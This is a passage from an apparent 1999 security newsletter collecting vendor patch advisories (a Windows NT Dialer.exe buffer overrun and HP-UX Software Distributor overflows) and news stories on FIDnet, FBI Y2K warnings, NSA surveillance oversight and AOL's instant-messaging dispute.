  9743.      Dialer.exe has an unchecked buffer in the portion of the program that processes the dialer.ini file. This vulnerability could be used to run arbitrary
  9744.      code via a classic buffer overrun technique.
  9745.      
  9746.      The circumstances of this vulnerability require a fairly complicated attack scenario that limits its scope. Dialer.exe runs in the security context of
  9747.      the user, so it would not benefit an attacker to simply modify a dialer.ini file and run it, as he or she would not gain additional privileges. Instead,
  9748.      the attacker would need to modify the dialer.ini file of another user who had higher privileges, then wait for that user to run Dialer.
  9749.      
  9750.      Although the unchecked buffer is present in all versions of Windows NT 4.0, the attack scenario would result in workstations that have dial-out
  9751.      capability being chiefly at risk. The FAQ discusses this in greater detail.
  9752.      
  9753.      Affected Software Versions
  9754.      
  9755.      =========================
  9756.      
  9757.           Microsoft Windows NT Workstation 4.0 
  9758.           Microsoft Windows NT Server 4.0 
  9759.           Microsoft Windows NT Server 4.0, Enterprise Edition 
  9760.           Microsoft Windows NT Server 4.0, Terminal Server Edition
  9761.      
  9762.       
  9763.      
  9764.      Patch Availability
  9765.      
  9766.      =================
  9767.      
  9768.           Windows NT Server; Windows NT Server 4.0, Enterprise Edition; and Windows NT Workstation 4.0:
  9769.           ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/
  9770.      
  9771.           NT40/hotfixes-postSP5/Dialer-fix/
  9772.      
  9773.           Windows NT Server 4.0, Terminal Server Edition:
  9774.      
  9775.           ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/
  9776.      
  9777.           nt40tse/hotfixes-postSP4/Dialer-fix/
  9778.      
  9779.           NOTE: Line breaks have been inserted into the above URLs for readability.
  9780.      
  9781.      More Information
  9782.      
  9783.      ===============
  9784.      
  9785.      Please see the following references for more information related to this issue.
  9786.      
  9787.           Microsoft Security Bulletin MS99-026: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-026faq.asp. 
  9788.           Microsoft Knowledge Base (KB) article Q237185,
  9789.      
  9790.           Dialer.exe Access Violation with Phone Entry more than 128 Bytes, http://support.microsoft.com/support/kb/articles/q237/1/85.asp. (Note:
  9791.           It may take 24 hours from the original posting of this bulletin for the KB article to be visible; however, a copy will be immediately available in
  9792.           the patch folder.)
  9793.      
  9794.           Microsoft Security Advisor web site,
  9795.      
  9796.           http://www.microsoft.com/security/default.asp.
  9797.      
  9798.      Obtaining Support on this Issue
  9799.      
  9800.      ==============================
  9801.      
  9802.      This is a fully supported patch. Information on contacting Microsoft Technical Support is available at
  9803.      http://support.microsoft.com/support/contact/default.asp.
  9804.      
  9805.      Acknowledgments
  9806.      
  9807.      ==============
  9808.      
  9809.      Microsoft acknowledges David Litchfield of Arca Systems for discovering this vulnerability and reporting it to us.
  9810.      
  9811.      Revisions
  9812.      
  9813.      ========
  9814.      
  9815.           July 29, 1999: Bulletin Created.
  9816.      
  9817.       
  9818.      
  9819.      --------------------------------------------------------------------------
  9820.      
  9821.      THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND.
  9822.      MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
  9823.      FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY
  9824.      DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
  9825.      DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
  9826.      SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO
  9827.      THE FOREGOING LIMITATION MAY NOT APPLY.
  9828.      
  9829.      ⌐ 1999 Microsoft Corporation. All rights reserved. Terms of Use.
  9830.      
  9831.      @HWA       
  9832.      
  9833. 75.0 Senate asks for input into information infrastructure protection plan
  9834.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9835.      
  9836.      http://www.fcw.com/pubs/fcw/1999/0726/web-plan-7-29-99.html
  9837.  
  9838.  
  9839.      JULY 29, 1999 . . . 18:15 EDT 
  9840.  
  9841.  
  9842.      Citing privacy concerns, Senate asks for input into
  9843.      information infrastructure protection plan
  9844.  
  9845.      BY DIANE FRANK (diane_frank@fcw.com)
  9846.  
  9847.      The Senate today urged federal officials to brief Congress on a Clinton
  9848.      administration plan to protect the federal information infrastructure from
  9849.      cyberattacks. The request followed stories this week in the general press that
  9850.      inaccurately reported that the draft plan would have the FBI monitor
  9851.      interactions with government computers.
  9852.  
  9853.      During a hearing of the Senate Special Committee on
  9854.      the Year 2000 Technology Problem, Sen. Bob
  9855.      Bennett (R-Utah) and Sen. Christopher Dodd
  9856.      (D-Conn.) both called for the draft plan to be released
  9857.      to Congress and asked for a closed briefing within the
  9858.      next few weeks.
  9859.  
  9860.      The National Plan for Information Systems Protection is being developed by the
  9861.      Critical Infrastructure Assurance Office (CIAO), the National Infrastructure
  9862.      Protection Center (NIPC), and other high-level officials and groups within the
  9863.      government. It is based on the critical infrastructure protection plans from
  9864.      agencies and industry required by Presidential Decision Directive 63 and was
  9865.      originally scheduled to be sent to Congress and the president this fall, according
  9866.      to John Tritak, director of the CIAO.
  9867.  
  9868.      Published stories based on a copy of the June 7 draft of the plan that was
  9869.      leaked to a public interest group raised several concerns that the senators felt
  9870.      Congress should know more about, including privacy issues surrounding the
  9871.      monitoring inherent in the proposed Federal Intrusion Detection Network
  9872.      (FIDnet). 
  9873.  
  9874.      "The issues, and specifically the FIDnet proposal reported by the [New York]
  9875.      Times, should be the subject of oversight by the Congress, which has yet to
  9876.      receive an official copy of the plan," Bennett said. "I am confident, given the
  9877.      timing of today's hearing, that a copy of the national plan will be forthcoming
  9878.      and that the oversight process can begin."
  9879.  
  9880.  
  9881.               Mail questions to webmaster@fcw.com
  9882.               Copyright 1999 FCW Government Technology Group     
  9883.     
  9884.     
  9885. 76.0 FBI: Beware outside Y2K workers
  9886.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9887.  
  9888.      (Online News, 07/29/99 11:43 AM)
  9889.  
  9890.  
  9891.  
  9892.       FBI: Beware outside Y2K workers
  9893.                       By Patrick Thibodeau
  9894.  
  9895.  
  9896.      WASHINGTON -- Private companies that have used outside
  9897.      firms to complete year 2000 repair work are running the risk
  9898.      that their systems have been compromised, a top Federal
  9899.      Bureau of Investigation official warned a congressional
  9900.      committee today. 
  9901.  
  9902.      Michael Vatis, a deputy assistant director at the FBI and
  9903.      director of the National Infrastructure Protection Center, said
  9904.      he is concerned that Y2K contractors, both foreign and
  9905.      domestic, have used the Y2K remediation process to install
  9906.      malicious code. 
  9907.  
  9908.      Vatis said the FBI doesn't have "concrete indications" that
  9909.      any group is planning to "to engage in unlawful intrusions" at
  9910.      the New Year. But the FBI is nonetheless expecting trouble,
  9911.      he said in testimony prepared for today's hearing by the
  9912.      U.S. Senate's Special Committee on the Year 2000
  9913.      Technology Problem. 
  9914.  
  9915.      Y2K contractors could compromise systems by installing
  9916.      trap doors, obtaining root access, implanting malicious
  9917.      code or mapping systems with the intent of selling
  9918.      information to economic competitors or foreign intelligence
  9919.      agencies. 
  9920.  
  9921.      Those with the motives and the means to compromise
  9922.      systems include foreign governments for information
  9923.      warfare purposes, as well as those engaged in industrial
  9924.      espionage, terrorism or organized crime, said Vatis. 
  9925.  
  9926.      The FBI expects to see increased and possibly violent
  9927.      activities among certain domestic groups. For instance, the
  9928.      coming of the millennium requires Christian Identity
  9929.      adherents to prepare for the "Second Coming of Christ" by
  9930.      taking violent action against their enemies. That kind of
  9931.      activity raises the possibility there could also be an increase
  9932.      in activity in the cyberworld, Vatis said in his testimony. 
  9933.  
  9934.      Given "the vulnerabilities [that] could be implanted in critical
  9935.      systems," said Vatis, "it is imperative that the client
  9936.      companies do as much as possible to check the
  9937.      background of the companies doing their remediation work,
  9938.      oversee the remediation process closely, and review new
  9939.      code as closely as possible and remove any extraneous
  9940.      code." 
  9941.  
  9942.      Moreover, Vatis advised companies to create "red teams" to
  9943.      try to crack their software and determine if trap doors exist. 
  9944.  
  9945.  
  9946.      @HWA
  9947.      
  9948. 77.0 HPSBUX9907-101 Security Vulnerability Software Distributor (SD)
  9949.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  9950.      
  9951.      
  9952.      HP Support Information Digests
  9953.      
  9954.       
  9955.      
  9956.      ===============================================================================
  9957.      
  9958.           HP Electronic Support Center World Wide Web Service
  9959.      
  9960.      ---------------------------------------------------
  9961.      
  9962.           If you subscribed through the HP Electronic Support Center and would like to be REMOVED from this mailing list, access the HP
  9963.           Electronic Support Center on the World Wide Web at:
  9964.      
  9965.           http://europe-support.external.hp.com
  9966.      
  9967.           Login using your HP Electronic Support Center User ID and Password. Then select Support Information Digests. You may then
  9968.           unsubscribe from the appropriate digest.
  9969.      
  9970.      ===============================================================================
  9971.      
  9972.      Digest Name: Daily Security Bulletins Digest
  9973.      
  9974.           Created: Mon Jul 26 15:00:02 METDST 1999
  9975.      
  9976.      Table of Contents:
  9977.      
  9978.      Document ID Title
  9979.      
  9980.      --------------- -----------
  9981.      
  9982.      HPSBUX9907-101 Security Vulnerability Software Distributor (SD)
  9983.      
  9984.      The documents are listed below.
  9985.      
  9986.      -------------------------------------------------------------------------------
  9987.      
  9988.           Document ID: HPSBUX9907-101
  9989.      
  9990.           Date Loaded: 19990725
  9991.      
  9992.           Title: Security Vulnerability Software Distributor (SD)
  9993.      
  9994.            
  9995.      
  9996.      -------------------------------------------------------------------------
  9997.      
  9998.           HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00101, 26 July 1999
  9999.      
  10000.      -------------------------------------------------------------------------
  10001.      
  10002.      The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any
  10003.      consequences to any customer resulting from customerÆs failure to fully implement instructions in this Security Bulletin as soon as possible.
  10004.      
  10005.       
  10006.      
  10007.      -------------------------------------------------------------------------
  10008.      
  10009.      PROBLEM: Buffer overflows in Software Distributor (SD) commands.
  10010.      
  10011.      PLATFORM: HP9000 Series 700/800 running HP-UX 10.XX, and 11.00,
  10012.      
  10013.           plus SD OpenView/ITA on other specific vendor platforms.
  10014.      
  10015.      DAMAGE: Users can gain increased privileges.
  10016.      
  10017.      SOLUTION: Apply the appropriate patch noted below.
  10018.      
  10019.      AVAILABILITY: All patches are available now.
  10020.      
  10021.       
  10022.      
  10023.      -------------------------------------------------------------------------
  10024.      
  10025.      I.
  10026.      
  10027.      A. Background
  10028.      
  10029.           A serious defect has been identified in the HP-UX SD filesets SW-DIST.RUPDATE SW-DIST.SD-AGENT SW-DIST.SD-CMDS.
  10030.      
  10031.      B. Fixing the problem - Install the applicable patch:
  10032.      
  10033.       
  10034.      
  10035.      SD-UX version B.10.10 on HP-UX release 10.01, 10.10: PHCO_15205
  10036.      
  10037.      SD-OV version A.01.01 on HP-UX release 10.01, 10.10: PHCO_15205
  10038.      
  10039.      SD-UX version B.10.20 on HP-UX release 10.20: * PHCO_15206
  10040.      
  10041.      SD-OV version A.01.02 on HP-UX release 10.20: * PHCO_15206
  10042.      
  10043.      HP-UX release 10.24: PHCO_19120
  10044.      
  10045.      HP-UX release 11.00: * PHCO_18183
  10046.      
  10047.           NOTE: There will be no patches for 10.00 nor 10.30.
  10048.      
  10049.           From http://ovweb.external.hp.com, retrieve the following:
  10050.      
  10051.      SDOV version A.01.02 for NT 3-4X: SDOV_00005
  10052.      
  10053.       
  10054.      
  10055.      SDOV version A.01.00 sparcSUN 4.1: SDOV_00006
  10056.      
  10057.      SDOV version A.01.00 sparcSOL 2.3: SDOV_00007
  10058.      
  10059.      SDOV version A.01.00 sparcSOL 2.4: SDOV_00008
  10060.      
  10061.      SDOV version A.01.00 sparcSOL 2.5: SDOV_00009
  10062.      
  10063.       
  10064.      
  10065.      SDOV version A.01.00 AIX 3.2: SDOV_00010
  10066.      
  10067.      SDOV version A.01.00 AIX 4.1: SDOV_00011
  10068.      
  10069.      SDOV version A.01.00 AIX 4.2: SDOV_00012
  10070.      
  10071.       
  10072.      
  10073.      SDOV version A.01.00 SNI5.42: SDOV_00013
  10074.      
  10075.           NOTE: For HP OpenView IT/Administration (ITA) version 3.10 or lower,
  10076.      
  10077.           please apply the SD-OV patches to all the managed nodes AFTER the installation of the ITA agent.
  10078.      
  10079.           Older, obsolete versions of Software Distributor which are not listed above are vulnerable to this security problem. There are no patches
  10080.           available nor will any be created for these versions. If you are using one of these, you should upgrade to a newer version. These older
  10081.           versions may have been installed as standalone HP OpenView Software Distributor products, or as part of HP OpenView IT/Administration
  10082.           products.
  10083.      
  10084.           For SD-UX version A.02.01 and newer, do not apply this patch.
  10085.      
  10086.                This "just released" A.02.01 version does not have the security problem and customers **should not** attempt to apply a patch to
  10087.                this version. A.02.01 applies to HP-UX 11.00 & 10.20, to Solaris 2.5/2.6, and to AIX 4.2/4.3.
  10088.      
  10089.           For questions concerning SD-OV issues related to this bulletin #101,
  10090.      
  10091.           send e-mail to: SDOV@security.hp.com
  10092.      
  10093.            
  10094.      
  10095.      C. To subscribe to automatically receive future NEW HP Security
  10096.      
  10097.           Bulletins from the HP Electronic Support Center via electronic mail, do the following:
  10098.      
  10099.           Use your browser to get to the HP Electronic Support Center page at:
  10100.      
  10101.           http://us-support.external.hp.com
  10102.      
  10103.           (for US, Canada, Asia-Pacific, & Latin-America) http://europe-support.external.hp.com (for Europe)
  10104.      
  10105.           Login with your user ID and password (or register for one).
  10106.      
  10107.           Remember to save the User ID assigned to you, and your password.
  10108.      
  10109.           Once you are in the Main Menu:
  10110.      
  10111.                To -subscribe- to future HP Security Bulletins, click on "Support Information Digests".
  10112.      
  10113.                To -review- bulletins already released from the main Menu, click on the "Search Technical Knowledge Database."
  10114.      
  10115.           Near the bottom of the next page, click on "Browse the HP Security Bulletin Archive".
  10116.      
  10117.           Once in the archive there is another link to our current Security Patch Matrix. Updated daily, this matrix categorizes security patches by
  10118.           platform/OS release, and by bulletin topic.
  10119.      
  10120.           The security patch matrix is also available via anonymous ftp:
  10121.      
  10122.           us-ffs.external.hp.com
  10123.      
  10124.           ~ftp/export/patches/hp-ux_patch_matrix
  10125.      
  10126.            
  10127.      
  10128.      D. To report new security vulnerabilities, send email to
  10129.      
  10130.           security-alert@hp.com
  10131.      
  10132.           Please encrypt any exploit information using the security-alert PGP key, available from your local key server, or by sending a message
  10133.           with a -subject- (not body) of æget keyÆ (no quotes) to security-alert@hp.com.
  10134.      
  10135.           Permission is granted for copying and circulating this Bulletin to Hewlett-Packard (HP) customers (or the Internet community) for the
  10136.           purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to HP, and provided such
  10137.           reproduction and/or distribution is performed for non-commercial purposes.
  10138.      
  10139.           Any other use of this information is prohibited. HP is not liable for any misuse of this information by any third party.
  10140.      
  10141.      ________________________________________________________________________
  10142.      
  10143.      -----End of Document ID: HPSBUX9907-101--------------------------------------
  10144.      
  10145.      
  10146.      @HWA 
  10147.  
  10148. 78.0 NSA spying on Americans? 
  10149.      ~~~~~~~~~~~~~~~~~~~~~~~~
  10150.      
  10151.  
  10152.      Big Brother Is Listening But Is He Breaking the Law When He Does It? 
  10153.  
  10154.      Some fear the United StatesÆ biggest spy
  10155.      agency is using new technology to spy
  10156.      illegally on Americans. (Thomas
  10157.      Schmid/ABCNEWS.com)
  10158.                                                         
  10159.  
  10160.      By David Ruppe
  10161.      ABCNEWS.com
  10162.      N E W  Y O R K, July 27 ù Is Uncle Sam illicitly
  10163.      reading your e-mail? Listening in on your
  10164.      telephone calls? Scanning your faxes?
  10165.           Some in Congress suspect advances in communications
  10166.      technology in recent years may have enabled AmericaÆs
  10167.      biggest, and most secret, spy agency, the National Security
  10168.      Agency, to greatly increase its eavesdropping powers at the
  10169.      expense of AmericansÆ privacy.
  10170.           But they canÆt be sure without a thorough congressional
  10171.      examination into the agencyÆs practices. And, they say, the
  10172.      NSA has not yet provided all the information requested by
  10173.      the House Select Intelligence Committee, which is looking
  10174.      into the question.
  10175.           That the National Security Agency intercepts
  10176.      AmericansÆ missives is clear. Observers point to the
  10177.      agencyÆs practice of intercepting massive volumes of
  10178.      communications through spy satellites and by listening to
  10179.      commercial communications satellites, which inevitably
  10180.      draws in the communications of U.S. citizens for whom the
  10181.      agency has no court order. 
  10182.           ôI have a problem with what the program appears to be
  10183.      doing, and that is, invading the privacy rights of American
  10184.      citizens without any reason, any court order, without any
  10185.      reasonable cause, without any probable cause, almost a
  10186.      dragnet invasion of privacy,ö says Rep. Bob Barr, R-Ga.,
  10187.      one of the NSAÆs most outspoken critics. 
  10188.  
  10189.      Intercepting U.S. Communications 
  10190.      Government officials admit the NSAÆs collection methods
  10191.      do draw in communications made by U.S. citizens.
  10192.           ôRead the statute, the executive order, the legislative
  10193.      history, and what youÆll find is the underlying assumption is
  10194.      that you canÆt avoid collecting U.S.-person information
  10195.      incidentally if you are going to do foreign intelligence
  10196.      collection,ö says an official familiar with the agency.
  10197.           The NSA maintains that it follows the laws and
  10198.      procedures Congress approved in the 1970s and 1980s for
  10199.      analyzing, retaining and disseminating that information,
  10200.      which were designed to balance the agencyÆs needs for
  10201.      gathering information with citizensÆ privacy rights as
  10202.      guaranteed by the ConstitutionÆs Fourth Amendment.
  10203.           According to classified procedures described by
  10204.      government officials, if the NSA incidentally obtains a
  10205.      communication made by or to a U.S. citizen or organization
  10206.      in the United States for which there is no warrant or court
  10207.      order, the NSA can keep the message but must remove the
  10208.      name of the citizen or company.
  10209.           The law also includes an exception: The name of the
  10210.      person can be retained in the message, included in analysis,
  10211.      and disseminated within the government, the official familiar
  10212.      with the agency notes, if NSA officials judge it is
  10213.      ônecessary to understand foreign intelligence information or
  10214.      assess its importance.ö
  10215.           ôThere are always judgments: æIs it necessary to
  10216.      understand the foreign intelligence requirements?Æ And
  10217.      people have to make those difficult choices all of the time,ö
  10218.      the official says. ôAll I can tell you is, [they] err on the side
  10219.      of caution.ö 
  10220.  
  10221.      Limited Oversight 
  10222.      Still, critics say there is no way to be sure the NSAÆs
  10223.      judgments consistently respect citizensÆ rights unless the
  10224.      congressional committees responsible for overseeing those
  10225.      rights have full access to information on how the agency
  10226.      applies the laws.
  10227.           The chairman of the the House Select Intelligence
  10228.      Committee, Rep. Porter Goss, R-Fla., has asked for all legal
  10229.      opinions and guidance provided by the NSAÆs legal office to
  10230.      the agency. Such guidance, which is supplied to the NSAÆs
  10231.      operations employees and other decision-makers, could
  10232.      show how the agency is applying the laws that restrict
  10233.      collection of information on Americans.
  10234.           Goss has not asserted that the NSAÆs collection
  10235.      activities are breaking the law. But he does seem concerned
  10236.      ù like Barr ù that the agency, through its interpretation of
  10237.      the laws, may be assuming greater powers ôin light of the
  10238.      enormous technological advances that have been made in
  10239.      the past several years.ö
  10240.           The committee needs the information ôto be sure the
  10241.      NSA General CounselÆs Office was interpreting NSAÆs
  10242.      legal authorities correctly and that NSA was not being
  10243.      arbitrary and capricious in its execution of its mission,ö he
  10244.      wrote.
  10245.           The NSAÆs General CounselÆs office has turned over
  10246.      some of the legal guidance, but it has declined to surrender
  10247.      all such communications, invoking, in a most unusual move,
  10248.      executive privilege. 
  10249.  
  10250.      Unreasonable Request? 
  10251.      The fact that the NSA is not turning over all of the
  10252.      requested information suggests Fourth Amendment rights
  10253.      against unreasonable searches and seizures may be in
  10254.      jeopardy, says Barr, a former CIA analyst who is not on the
  10255.      committee. ôIt certainly raises that suspicion and it doesnÆt
  10256.      serve them well to do that.ö
  10257.           BarrÆs suspicions seem to have found sympathy in the
  10258.      House, which amended its Intelligence Reauthorization bill
  10259.      with a provision by Barr that would require the NSA to
  10260.      make an annual report explaining its interpretation of the
  10261.      laws, including all materials showing its interpretation. 
  10262.           
  10263.  
  10264.      Intelligence Gathering Regulation in
  10265.      America
  10266.  
  10267.      1789 to 1966: Electronic surveillance basically was not
  10268.      regulated. 
  10269.      1928: The Supreme Court rules in Olmstead vs. United
  10270.      States that a wiretap on a phone did not violate Fourth
  10271.      Amendment rights against search and seizure. 
  10272.      1934: Congress enacts the Federal Communications Act,
  10273.      which prohibited the interception of any communications and
  10274.      the divulgence of the contents of intercepted
  10275.      communications by federal agents without a court order or a
  10276.      warrant. 
  10277.      1966: The Supreme Court rules in Katz vs. United States
  10278.      that basically all forms of eavesdropping require a warrant or
  10279.      court order. It ruled the Fourth Amendment allows for the
  10280.      protection of a person, not just a personÆs property, against
  10281.      illegal searches, so that whatever a citizen ôseeks to
  10282.      preserve as private, even in an area accessible to the public,
  10283.      may be constitutionally protected.ö 
  10284.      1968: Congress codifies the Katz decision. Establishes
  10285.      requirements for obtaining a warrant, including
  10286.      demonstrating probable cause to a court, and limits to
  10287.      warrants. Sec. 2511 of the statute says warrants still are not
  10288.      needed for foreign intelligence electronic surveillance and
  10289.      national security surveillance. 
  10290.      1972: Supreme Court rules in 1972 that domestic security
  10291.      cases are law enforcement cases, not foreign intelligence
  10292.      cases, and so require a warrant to target a U.S. citizen. If
  10293.      there is a connection to a foreign power or agent of a foreign
  10294.      power then no court order is needed. 
  10295.      1975-1976: Church and Pike Committee investigations,
  10296.      specially ordered by Congress, expose government
  10297.      electronic surveillance collection, processing, retention, and
  10298.      dissemination of information on U.S. citizens. 
  10299.      1976 & 1977: Senate, then House, creates Select
  10300.      Intelligence Committee for overseeing activities of the U.S.
  10301.      intelligence community. 
  10302.      1978: Congress passes Foreign Intelligence Surveillance
  10303.      Act, that regulates foreign intelligence electronic
  10304.      surveillance. It requires a special court order procedure to
  10305.      authorize electronic surveillance for intelligence purposes on
  10306.      targeted U.S. persons. Ensuing regulations, which are
  10307.      classified, set out procedures for handling foreign
  10308.      intelligence electronic surveillance. 
  10309.  
  10310.  
  10311.  
  10312.      The NSAÆs position has been it has nothing to hide and has
  10313.      no problem fulfilling requests for specific information. But as
  10314.      last Thursday, the agency continued to view the
  10315.      committeeÆs request for all legal opinions and discussions as
  10316.      unreasonable.
  10317.           ô[They] have no problem providing information on any
  10318.      subject,ö says the government official familiar with the
  10319.      agency, who explained the NSAÆs position. ôBut there has
  10320.      got to be some principle. The executive branch has to retain
  10321.      some information.ö
  10322.           Turning over all legal guidance to the committee, the
  10323.      official argued, would be an enormous task and might also
  10324.      discourage employees from seeking the legal officeÆs advice
  10325.      in the future. 
  10326.  
  10327.      æCloak of SecrecyÆ 
  10328.      Goss, in a May committee report, rejected such arguments
  10329.      out of hand, reminding the agency of its legal requirement to
  10330.      furnish ôany information or material concerning intelligenceö
  10331.      requested by the House and Senate intelligence committees.
  10332.           The agencyÆs refusal to release information requested by
  10333.      the committee could ôseriously hobble the legislative
  10334.      oversight process,ö and would ôresult in the envelopment of
  10335.      the executive branch in a cloak of secrecy,ö he wrote the
  10336.      chairman.
  10337.           ôWithout access to such documents, Congress would be
  10338.      left only with the æspinÆ the executive branch agency opted
  10339.      to provide to the legislative branch,ö Goss wrote.
  10340.           Barr concurs.
  10341.           ô[NSA officials] are not the ones to tell the oversight
  10342.      folks what they can see,ö he says. ôIf they can, then there is
  10343.      hollow oversight, and thatÆs arrogance.ö
  10344.  
  10345.                                                   
  10346.       X-Files or Reality? 
  10347.       If you think suspicions of government eavesdropping on
  10348.       Americans sounds more like the stuff of the TV show
  10349.       X-Files than reality, you only have to go back to the 1970s
  10350.       to be dissuaded.
  10351.            Congressional hearings then revealed the NSA had
  10352.       been engaging in serious abuses of U.S. citizensÆ Fourth
  10353.       Amendment rights. In short, the agency had been
  10354.       eavesdropping on hundreds of controversial American
  10355.       figures who had nothing to do with foreign intelligence,
  10356.       such as the Rev. Martin Luther King Jr., had delivered the
  10357.       intercepted information to other agencies, and had kept
  10358.       files on the figures. 
  10359.            Following the hearings, Congress in 1978 passed the
  10360.       Foreign Intelligence Surveillance Act, restricting to a large
  10361.       extent the spy agencyÆs ability to collect information on
  10362.       Americans. The House and Senate Select Intelligence
  10363.       Committees were created to oversee the agencies. 
  10364.            Few experts now believe the NSA could be doing
  10365.       anything so serious today. 
  10366.            ôIf you ask me whether they are consciously ignoring all
  10367.       of those restrictions, my best guess would be no,ö says
  10368.       Jeffrey Richelson, an intelligence analyst with the
  10369.       nongovernmental, nonprofit National Security Archive. ôThis
  10370.       is not the Vietnam War, this is not that period of time, and
  10371.       Nixon is not president.ö
  10372.            James Bamford, author of the definitive book on the
  10373.       NSA, The Puzzle Palace, agrees. ôI donÆt think itÆs as big a
  10374.       problem as some out there are pushing it,ö he says.
  10375.            ôOn the other hand, it has been 25 years since thereÆs
  10376.       been a real hard-nosed congressional probe into
  10377.       intelligence, so they could probably get away with quite a
  10378.       bit at this point.ö
  10379.            According to an official familiar with the NSA, in the
  10380.       1970s the agency abandoned practices designed to get
  10381.       around the laws such as ôreverse targeting.ö Reverse
  10382.       targeting occurred when an NSA employee purposely
  10383.       conducted a search on an approved subject so that he
  10384.       could collect information on a person for whom there was
  10385.       no warrant.
  10386.            ôTo talk about what NSA used to do in the 1960s and
  10387.       1970s, conclude thatÆs what [theyÆre] doing now à is just
  10388.       living in a dream world,ö says the official. ôThat simply isnÆt
  10389.       reality.ö 
  10390.  
  10391.       @HWA 
  10392.                    
  10393. 79.0 AOL messaging policy might risk cable deals 
  10394.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10395.      
  10396.      http://www.news.com/News/Item/Textonly/0,25,39758,00.html 
  10397.      
  10398.      AOL messaging policy might risk cable deals 
  10399.      By Reuters
  10400.      Special to CNET News.com 
  10401.      July 27, 1999, 3:25 a.m. PT 
  10402.      URL: http://www.news.com/News/Item/0,4,39758,00.html 
  10403.      
  10404.      America Online might back off efforts to block rival "instant messaging" services because the actions threaten to undermine its lobbying push to get access to high-speed
  10405.      cable Internet lines, public policy analysts said yesterday.
  10406.      
  10407.      Over the past few days, engineers at the No. 1 online service worked diligently to thwart efforts by Microsoft and Yahoo to allow consumers using their messaging
  10408.      products to connect with AOL customers and accounts.
  10409.      
  10410.      So-called instant messaging programs are used by tens of millions of Internet surfers to send and receive quick text messages that pop up immediately on the computer
  10411.      screens of their online pals. AOL is by far the market leader, with more than 80 million users of its two instant messaging products.
  10412.      
  10413.      AOL executives offered a variety of explanations for their efforts to block competitors' access, including that Microsoft had put the security and privacy of their
  10414.      customers at risk--a charge Microsoft vehemently denied.
  10415.      
  10416.      But analysts said that even if AOL was factually correct in some of its arguments, the moves would hurt the company's credibility on the cable open access issue where
  10417.      it is pushing to have exclusive deals banned.
  10418.      
  10419.      Cable companies have required customers buying high-speed net access over cable lines to also buy Internet services like email and Web page hosting from them. The
  10420.      exclusive deals are unfair to other Internet service providers, AOL argues.
  10421.      
  10422.      "Open is open," said Legg Mason Precursor Group analyst Scott Cleland, who has long predicted that AOL will ultimately prevail and gain access to cable high-speed
  10423.      Internet services. "When you're denying consumers a choice of something, it looks bad in any case."
  10424.      
  10425.      Online analyst Gary Arlen, president of Arlen Communications, predicted AOL's position on cable access would ultimately trump its decision to close up its instant
  10426.      messaging product.
  10427.      
  10428.      Cable companies like AT&T "will use AOL's instant messaging position as a defense," Arlen said. "Cable open access is truly the much bigger, longer-term issue. I don't
  10429.      know how the IM deal is going to work but I think that one will get settled."
  10430.      
  10431.      In fact, AT&T general counsel Jim Cicconi did just as Arlen predicted, issuing a statement calling AOL's moves "hypocritical and antithetical to the very ethos of the
  10432.      Internet."
  10433.      
  10434.      Some of AOL's supporters on the cable issue noted that cable was a regulated monopoly running on public property, as opposed to AOL's development of a software
  10435.      product for the unregulated Internet. But few seemed eager to enter the instant messaging fray on the record.
  10436.      
  10437.      Until recently, each of the various instant messaging products was a separate and incompatible communications tool, allowing contact only with others using the same
  10438.      product.
  10439.      
  10440.      Microsoft last week introduced a product called MSN Messenger that promised communications with people using AOL's instant messenger as well.
  10441.      
  10442.      To make the feat possible, Microsoft's messenger software asked users for their AOL user name and password. The information was not sent to Microsoft but allowed
  10443.      the Microsoft software to log users into AOL's network.
  10444.      
  10445.      AOL then changed the way its network was set up so Microsoft users were blocked out. Microsoft responded with a quick fix and, after several rounds, Microsoft said
  10446.      late yesterday that its newest version was communicating with AOL users.
  10447.      
  10448.      "There's a right way and a wrong way," said AOL spokeswoman Ann Brackbill, defending her company's right to block MSN. "But without the right coordination and
  10449.      standards, the privacy and security of consumers is going to be at risk."
  10450.      
  10451.      AOL will support the development of a universal Internet standard for connecting all instant messaging software, Brackbill added.
  10452.      
  10453.      "The only issue here is how the industry will work together to overcome the technical obstacles to interconnecting the various IM systems," she said.
  10454.      
  10455.      Microsoft product manager Deanna Sanford said AOL had in the past declined to support such an industry-wide effort underway at the Internet Engineering Task
  10456.      Force, a consensus-based standards writing body.
  10457.      
  10458.      "Ultimately, it would be great if we could all support some standards," Sanford said. "It would be great if AOL would." 
  10459.      
  10460.      Story Copyright ⌐ 1999 Reuters Limited. All rights reserved. 
  10461.      
  10462.      @HWA                                  
  10463.                            
  10464. 80.0 Study calls for reserve virtual IT warfare unit
  10465.      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  10466.  
  10467.      http://www.fcw.com/pubs/fcw/1999/0726/fcw-newsreserve-07-26-99.html
  10468.      
  10469.      JULY 26, 1999 
  10470.  
  10471.  
  10472.      Study calls for reserve virtual IT warfare unit
  10473.  
